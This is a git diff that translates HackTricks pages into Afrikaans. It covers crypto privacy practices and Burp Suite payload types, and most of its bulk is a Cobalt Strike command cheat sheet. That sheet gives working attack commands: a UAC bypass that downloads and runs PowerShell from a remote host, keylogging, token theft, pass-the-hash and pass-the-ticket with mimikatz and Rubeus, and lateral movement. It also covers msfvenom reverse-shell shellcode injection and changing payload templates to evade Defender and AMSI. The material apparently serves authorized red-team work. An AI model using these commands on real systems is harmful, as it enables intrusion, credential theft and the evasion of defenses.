transaksie tussen twee partye (bv. 'n kliënt en 'n handelaar) as 'n gewone transaksie, sonder die kenmerkende gelyke uitsette van CoinJoin. Dit maak dit uiters moeilik om op te spoor en kan die algemene-inset-eienaarskap-heuristiek wat deur transaksie-surveillance-entiteite gebruik word, ongeldig maak. ```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` +Transaksies soos die bogenoemde kan PayJoin wees, wat privaatheid verbeter terwyl dit nie onderskeibaar is van standaard bitcoin-transaksies nie. -Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions. - -**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy. +**Die gebruik van PayJoin kan tradisionele bewakingsmetodes aansienlik ontwrig**, wat dit 'n belowende ontwikkeling maak in die strewe na transaksionele privaatheid. -# Best Practices for Privacy in Cryptocurrencies +# Beste Praktyke vir Privatiteit in Kriptogeldeenhede -## **Wallet Synchronization Techniques** +## **Balgelykmaak van Beursies Tegnieke** -To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out: +Om privaatheid en veiligheid te handhaaf, is dit noodsaaklik om beursies met die blokketting te sinchroniseer. Twee metodes steek uit: -- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in. -- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found. +- **Volle knoop**: Deur die hele blokketting af te laai, verseker 'n volle knoop maksimum privaatheid. Alle transaksies wat ooit gemaak is, word plaaslik gestoor, wat dit onmoontlik maak vir teenstanders om te identifiseer watter transaksies of adresse die gebruiker belangstel. +- **Kliëntkant blokfiltering**: Hierdie metode behels die skep van filters vir elke blok in die blokketting, wat beursies in staat stel om relevante transaksies te identifiseer sonder om spesifieke belange aan netwerkwaarnemers bloot te stel. Ligte beursies laai hierdie filters af en haal slegs volle blokke binne wanneer 'n ooreenstemming met die gebruiker se adresse gevind word. -## **Utilizing Tor for Anonymity** +## **Die Gebruik van Tor vir Anonimiteit** -Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network. +Aangesien Bitcoin op 'n eweknie-netwerk werk, word dit aanbeveel om Tor te gebruik om jou IP-adres te verberg en sodoende privaatheid te verbeter wanneer jy met die netwerk skakel. -## **Preventing Address Reuse** +## **Voorkoming van Adres Hergebruik** -To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design. +Om privaatheid te beskerm, is dit noodsaaklik om 'n nuwe adres vir elke transaksie te gebruik. Adres hergebruik kan privaatheid in gevaar bring deur transaksies aan dieselfde entiteit te koppel. Moderne beursies ontmoedig adres hergebruik deur hul ontwerp. -## **Strategies for Transaction Privacy** +## **Strategieë vir Transaksie-Privaatheid** -- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks. -- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods. -- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy. +- **Meervoudige transaksies**: Die opsplitting van 'n betaling in verskeie transaksies kan die transaksiebedrag verdoesel, wat privaatheidsaanvalle voorkom. +- **Vermyding van wisselgeld**: Die keuse vir transaksies wat nie wisselgeld-uitsette vereis nie, verbeter privaatheid deur wisselgeld-opsporingsmetodes te ontwrig. +- **Meervoudige wisselgeld-uitsette**: As die vermyding van wisselgeld nie haalbaar is nie, kan die skep van meervoudige wisselgeld-uitsette steeds privaatheid verbeter. -# **Monero: A Beacon of Anonymity** +# **Monero: 'n Baken van Anonimiteit** -Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy. +Monero spreek die behoefte aan absolute anonimiteit in digitale transaksies aan en stel 'n hoë standaard vir privaatheid. -# **Ethereum: Gas and Transactions** +# **Ethereum: Gas en Transaksies** -## **Understanding Gas** +## **Begrip van Gas** -Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded. +Gas meet die berekeningspoging wat nodig is om operasies op Ethereum uit te voer, geprijs in **gwei**. Byvoorbeeld, 'n transaksie wat 2,310,000 gwei (of 0.00231 ETH) kos, behels 'n gaslimiet en 'n basisfooi, met 'n fooi om mynwerkers te motiveer. Gebruikers kan 'n maksimumfooi instel om te verseker dat hulle nie te veel betaal nie, met die oortollige bedrag wat terugbetaal word. -## **Executing Transactions** +## **Uitvoering van Transaksies** -Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data. +Transaksies in Ethereum behels 'n afsender en 'n ontvanger, wat beide gebruikers- of slimkontrakadresse kan wees. Hulle vereis 'n fooi en moet gemyn word. Essensiële inligting in 'n transaksie sluit die ontvanger, die afsender se handtekening, waarde, opsionele data, gaslimiet en fooie in. Merkwaardig word die afsender se adres afgelei uit die handtekening, wat die behoefte daaraan in die transaksiedata elimineer. -These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security. +Hierdie praktyke en meganismes is fundamenteel vir enigiemand wat betrokke wil raak by kriptogeldeenhede terwyl privaatheid en veiligheid vooropgestel word. -## References +## Verwysings * [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake) * [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) @@ -201,16 +195,14 @@ These practices and mechanisms are foundational for anyone looking to engage wit
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/burp-suite.md b/burp-suite.md index bc9169270..42a345e3e 100644 --- a/burp-suite.md +++ b/burp-suite.md @@ -1,29 +1,27 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# Basic Payloads +# Basiese Payloads -* **Simple List:** Just a list containing an entry in each line -* **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists. -* **Case Modification:** Apply some changes to a list of strings(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-. -* **Numbers:** Generate numbers from X to Y using Z step or randomly. -* **Brute Forcer:** Character set, min & max length. +* **Eenvoudige lys:** Net 'n lys met 'n inskrywing in elke lyn +* **Runtime-lêer:** 'n Lys wat tydens uitvoering gelees word (nie in geheue gelaai nie). Vir ondersteuning van groot lyste. +* **Gevalverandering:** Pas sekere veranderinge toe op 'n lys van strings (Geen verandering, na kleinletters, na GROOTLETTERS, na 'n korrekte naam - Eerste letter in hoofletters en die res na kleinletters -, na 'n korrekte naam - Eerste letter in hoofletters en die res bly dieselfde -. +* **Getalle:** Genereer getalle vanaf X tot Y met 'n stap van Z of lukraak. +* **Brute Forcer:** Karakterset, minimum & maksimum lengte. -[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab. +[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload om opdragte uit te voer en die uitset deur DNS-versoeke na burpcollab te gryp. {% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} @@ -32,16 +30,14 @@ Other ways to support HackTricks:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/c2/cobalt-strike.md b/c2/cobalt-strike.md index d0c3e70ae..e72ce61d0 100644 --- a/c2/cobalt-strike.md +++ b/c2/cobalt-strike.md @@ -1,217 +1,206 @@ # Cobalt Strike -### Listeners +### Luisteraars -### C2 Listeners +### C2 Luisteraars -`Cobalt Strike -> Listeners -> Add/Edit` then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more. +`Cobalt Strike -> Luisteraars -> Toevoegen/Bewerken` dan kan jy kies waar om te luister, watter soort beacon om te gebruik (http, dns, smb...) en meer. -### Peer2Peer Listeners +### Peer2Peer Luisteraars -The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons. +Die beacons van hierdie luisteraars hoef nie direk met die C2 te praat nie, hulle kan daarmee kommunikeer deur ander beacons. -`Cobalt Strike -> Listeners -> Add/Edit` then you need to select the TCP or SMB beacons +`Cobalt Strike -> Luisteraars -> Toevoegen/Bewerken` dan moet jy die TCP of SMB beacons kies -* The **TCP beacon will set a listener in the port selected**. To connect to a TCP beacon use the command `connect ` from another beacon -* The **smb beacon will listen in a pipename with the selected name**. To connect to a SMB beacon you need to use the command `link [target] [pipe]`. +* Die **TCP beacon sal 'n luisteraar op die gekose poort stel**. Om aan te sluit by 'n TCP beacon gebruik die opdrag `connect ` van 'n ander beacon +* Die **smb beacon sal luister in 'n pypnaam met die gekose naam**. Om aan te sluit by 'n SMB beacon moet jy die opdrag `link [target] [pipe]` gebruik. -### Generate & Host payloads +### Genereer & Berg payloads op -#### Generate payloads in files +#### Genereer payloads in lêers -`Attacks -> Packages ->` +`Aanvalle -> Pakkette ->` -* **`HTMLApplication`** for HTA files -* **`MS Office Macro`** for an office document with a macro -* **`Windows Executable`** for a .exe, .dll orr service .exe -* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs) +* **`HTMLApplication`** vir HTA lêers +* **`MS Office Macro`** vir 'n kantoor dokument met 'n makro +* **`Windows Uitvoerbare`** vir 'n .exe, .dll of diens .exe +* **`Windows Uitvoerbare (S)`** vir 'n **stageless** .exe, .dll of diens .exe (beter stageless as staged, minder IoCs) -#### Generate & Host payloads +#### Genereer & Berg payloads op -`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python +`Aanvalle -> Web Drive-by -> Geskripteerde Web Aflewering (S)` Dit sal 'n skrip/uitvoerbare lêer genereer om die beacon van cobalt strike af te laai in formate soos: bitsadmin, exe, powershell en python -#### Host Payloads +#### Berg Payloads op -If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config. +As jy reeds die lêer het wat jy wil berg in 'n webbediener, gaan net na `Aanvalle -> Web Drive-by -> Berg Lêer op` en kies die lêer om op te berg en webbediener konfigurasie. -### Beacon Options +### Beacon Opsies -
# Execute local .NET binary
+
# Voer plaaslike .NET binêre uit
 execute-assembly </path/to/executable.exe>
 
-# Screenshots
-printscreen    # Take a single screenshot via PrintScr method
-screenshot     # Take a single screenshot
-screenwatch    # Take periodic screenshots of desktop
-## Go to View -> Screenshots to see them
+# Skermskote
+printscreen    # Neem 'n enkele skermskoot via die PrintScr metode
+screenshot     # Neem 'n enkele skermskoot
+screenwatch    # Neem periodieke skermskote van die skerm
+## Gaan na View -> Skermskote om hulle te sien
 
-# keylogger
+# sleutellogger
 keylogger [pid] [x86|x64]
-## View > Keystrokes to see the keys pressed
+## View > Keystrokes om die gedrukte sleutels te sien
 
-# portscan
-portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
+# poortskandering
+portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Injecteer poortskandering aksie binne 'n ander proses
 portscan [targets] [ports] [arp|icmp|none] [max connections]
 
 # Powershell
-# Import Powershell module
+# Importeer Powershell module
 powershell-import C:\path\to\PowerView.ps1
-powershell <just write powershell cmd here>
+powershell <skryf net powershell opdrag hier>
 
-# User impersonation
-## Token generation with creds
-make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network
-ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
-rev2self # Stop using token generated with make_token
-## The use of make_token generates event 4624: An account was successfully logged on.  This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type.  As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
+# Gebruiker simulasie
+## Token generasie met geloofsbriewe
+make_token [DOMAIN\user] [password] # Skep 'n token om 'n gebruiker in die netwerk te simuleer
+ls \\computer_name\c$ # Probeer om die gegenereerde token te gebruik om toegang te verkry tot C$ op 'n rekenaar
+rev2self # Hou op om die token wat gegenereer is met make_token te gebruik
+## Die gebruik van make_token genereer gebeurtenis 4624: 'n Rekening is suksesvol aangemeld. Hierdie gebeurtenis is baie algemeen in 'n Windows domein, maar kan beperk word deur te filtreer op die Aanmeldingstipe. Soos hierbo genoem, gebruik dit LOGON32_LOGON_NEW_CREDENTIALS wat tipe 9 is.
 
 # UAC Bypass
-elevate svc-exe <listener>
-elevate uac-token-duplication <listener>
+elevate svc-exe <luisteraar>
+elevate uac-token-duplication <luisteraar>
 runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
 
-## Steal token from pid
-## Like make_token but stealing the token from a process
-steal_token [pid] # Also, this is useful for network actions, not local actions
-## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
-ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
-rev2self # Stop using token from steal_token
+## Steel token van pid
+## Soos make_token, maar steel die token van 'n proses
+steal_token [pid] # Dit is ook nuttig vir netwerkaksies, nie plaaslike aksies nie
+## Uit die API-dokumentasie weet ons dat hierdie aanmeldingstipe "die oproeper in staat stel om sy huidige token te kloon". Dit is hoekom die Beacon-uitset sê Impersonated <current_username> - dit simuleer ons eie gekloonde token.
+ls \\computer_name\c$ # Probeer om die gegenereerde token te gebruik om toegang te verkry tot C$ op 'n rekenaar
+rev2self # Hou op om die token van steal_token te gebruik
 
-## Launch process with nwe credentials
-spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\
-## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE).  It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
+## Lancering van proses met nuwe geloofsbriewe
+spawnas [domain\username] [password] [luisteraar] # Doen dit vanaf 'n gids met leestoegang soos: cd C:\
+## Soos make_token, sal dit Windows-gebeurtenis 4624 genereer: 'n Rekening is suksesvol aangemeld, maar met 'n aanmeldingstipe van 2 (LOGON32_LOGON_INTERACTIVE). Dit sal die oproepende gebruiker (TargetUserName) en die gesimuleerde gebruiker (TargetOutboundUserName) beskryf.
 
-## Inject into process
-inject [pid] [x64|x86] [listener]
-## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).
+## Injecteer in proses
+inject [pid] [x64|x86] [luisteraar]
+## Vanuit 'n OpSec-oogpunt: Moenie kruisplatform-injectie uitvoer tensy jy regtig moet nie (bv. x86 -> x64 of x64 -> x86).
 
-## Pass the hash
-## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.
+## Pass die hash
+## Hierdie wysigingsproses vereis patching van LSASS-geheue wat 'n hoë-risiko-aksie is, vereis plaaslike admin-voorregte en is nie altyd lewensvatbaar as Protected Process Light (PPL) geaktiveer is nie.
 pth [pid] [arch] [DOMAIN\user] [NTLM hash]
 pth [DOMAIN\user] [NTLM hash]
 
-## Pass the hash through mimikatz
+## Pass die hash deur mimikatz
 mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:"powershell -w hidden"
-## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
-steal_token <pid> #Steal token from process created by mimikatz
+## Sonder /run, sal mimikatz 'n cmd.exe spawn, as jy as 'n gebruiker met 'n skerm hardloop, sal hy die skerm sien (as jy as SYSTEM hardloop, is jy reg om te gaan)
+steal_token <pid> #Steel token van proses wat deur mimikatz geskep is
 
-## Pass the ticket
-## Request a ticket
+## Pass die kaartjie
+## Versoek 'n kaartjie
 execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec
-## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
+## Skep 'n nuwe aanmeldsessie om saam met die nuwe kaartjie te gebruik (om nie die gekompromitteerde een te oorskryf nie)
 make_token <domain>\<username> DummyPass
-## Write the ticket in the attacker machine from a poweshell session & load it
+## Skryf die kaartjie in die aanvaller se masjien vanuit 'n poweshell-sessie & laai dit
 [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
 kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
 
-## Pass the ticket from SYSTEM
-## Generate a new process with the ticket
+## Pass die kaartjie vanaf SYSTEM
+## Skep 'n nuwe proses met die kaartjie
 execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
-## Steal the token from that process
+## Steel die token van daardie proses
 steal_token <pid>
 
-## Extract ticket + Pass the ticket
-### List tickets
+## Haal kaartjie uit + Pass die kaartjie
+### Lys kaartjies
 execute-assembly C:\path\Rubeus.exe triage
-### Dump insteresting ticket by luid
+### Dump interessante kaartjie deur luid
 execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
-### Create new logon session, note luid and processid
-execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
-### Insert ticket in generate logon session
-execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
-### Finally, steal the token from that new process
+### Skep 'n nuwe aanmeldsessie, neem luid en proses-ID op
+execute-assembly C:\pad\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
+### Voeg kaartjie in in gegenereerde aanmeldsessie
+execute-assembly C:\pad\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-kaartjie...]
+### Steel uiteindelik die token van daardie nuwe proses
 steal_token <pid>
 
-# Lateral Movement
-## If a token was created it will be used
-jump [method] [target] [listener]
-## Methods:
-## psexec                    x86   Use a service to run a Service EXE artifact
-## psexec64                  x64   Use a service to run a Service EXE artifact
-## psexec_psh                x86   Use a service to run a PowerShell one-liner
-## winrm                     x86   Run a PowerShell script via WinRM
-## winrm64                   x64   Run a PowerShell script via WinRM
+# Laterale beweging
+## As 'n token geskep is, sal dit gebruik word
+jump [metode] [teiken] [luisteraar]
+## Metodes:
+## psexec                    x86   Gebruik 'n diens om 'n Service EXE-artefak uit te voer
+## psexec64                  x64   Gebruik 'n diens om 'n Service EXE-artefak uit te voer
+## psexec_psh                x86   Gebruik 'n diens om 'n PowerShell-eenreëliner uit te voer
+## winrm                     x86   Voer 'n PowerShell-skripsie uit via WinRM
+## winrm64                   x64   Voer 'n PowerShell-skripsie uit via WinRM
 
-remote-exec [method] [target] [command]
-## Methods:
-## psexec                          Remote execute via Service Control Manager
-## winrm                           Remote execute via WinRM (PowerShell)
-## wmi                             Remote execute via WMI
+remote-exec [metode] [teiken] [opdrag]
+## Metodes:
+## psexec                          Voer op afstand uit via die Diensbeheerder
+## winrm                           Voer op afstand uit via WinRM (PowerShell)
+## wmi                             Voer op afstand uit via WMI
 
-## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute it
+## Om 'n beacon met wmi uit te voer (dit is nie in die jump-opdrag nie) laai net die beacon op en voer dit uit
 beacon> upload C:\Payloads\beacon-smb.exe
 beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
 
 
-# Pass session to Metasploit - Through listener
-## On metaploit host
+# Gee sessie aan Metasploit - Deur middel van 'n luisteraar
+## Op Metasploit-gashuis
 msf6 > use exploit/multi/handler
 msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
 msf6 exploit(multi/handler) > set LHOST eth0
 msf6 exploit(multi/handler) > set LPORT 8080
 msf6 exploit(multi/handler) > exploit -j
 
-## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
+## Op cobalt: Luisteraars > Voeg by en stel die Payload in op Foreign HTTP. Stel die Host in op 10.10.5.120, die Poort op 8080 en klik op Stoor.
 beacon> spawn metasploit
-## You can only spawn x86 Meterpreter sessions with the foreign listener.
+## Jy kan slegs x86 Meterpreter-sessies spawn met die vreemde luisteraar.
 
-# Pass session to Metasploit - Through shellcode injection
-## On metasploit host
+# Gee sessie aan Metasploit - Deur middel van shellcode-injeksie
+## Op Metasploit-gashuis
 msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
-## Run msfvenom and prepare the multi/handler listener
+## Voer msfvenom uit en berei die multi/handler-luisteraar voor
 
-## Copy bin file to cobalt strike host
+## Kopieer binêre lêer na cobalt strike-gashuis
 ps
-shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
+shinject <pid> x64 C:\Payloads\msf.bin #Injecteer Metasploit shellcode in 'n x64-proses
 
-# Pass metasploit session to cobalt strike
-## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
-## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode
+# Gee Metasploit-sessie aan cobalt strike
+## Genereer stageless Beacon shellcode, gaan na Aanvalle > Pakkette > Windows Uitvoerbare lêer (S), kies die gewenste luisteraar, kies Raw as die Uitvoertipe en kies Gebruik x64-payload.
+## Gebruik post/windows/manage/shellcode_inject in Metasploit om die gegenereerde cobalt strike shellcode in te spuit
 
 
 # Pivoting
-## Open a socks proxy in the teamserver
+## Maak 'n sokkiesproksi oop in die spanbediener
 beacon> socks 1080
 
-# SSH connection
-beacon> ssh 10.10.17.12:22 username password

+# SSH-verbinding
+beacon> ssh 10.10.17.12:22 gebruikersnaam wagwoord
-## Avoiding AVs +## Vermy AV's -### Artifact Kit +### Artefaktkit -Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons. +Gewoonlik in `/opt/cobaltstrike/artifact-kit` kan jy die kode en vooraf saamgestelde sjablone (in `/src-common`) van die payloads vind wat cobalt strike gaan gebruik om die binêre beacons te genereer. -Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary. - -After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`. +Deur [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) te gebruik met die gegenereerde agterdeur (of net met die saamgestelde sjabloon) kan jy vind wat verdediger aktiveer. Dit is gewoonlik 'n string. Jy kan dus net die kode wat die agterdeur genereer wysig sodat daardie string nie in die finale binêre lêer verskyn nie. +Nadat jy die kode gewysig het, voer jy net `./build.sh` uit vanuit dieselfde gids en kopieer die `dist-pipe/`-gids na die Windows-kliënt in `C:\Tools\cobaltstrike\ArtifactKit`. ``` pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe . ``` +Moenie vergeet om die aggressiewe skrip `dist-pipe\artifact.cna` te laai om aan te dui dat Cobalt Strike die hulpbronne vanaf die skyf moet gebruik wat ons wil hê en nie die een wat gelaai is nie. -Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded. +### Hulpbronpakket -### Resource Kit - -The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA. - -Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it: +Die Hulpbronpakket-vouer bevat die sjablone vir Cobalt Strike se skripsgebaseerde vragte, insluitend PowerShell, VBA en HTA. +Deur [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) saam met die sjablone te gebruik, kan jy vind wat die verdediger (AMSI in hierdie geval) nie wil hê nie en dit wysig: ``` .\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1 ``` +### Verander die opgespoorde lyne sodat jy 'n sjabloon kan genereer wat nie opgemerk sal word nie. 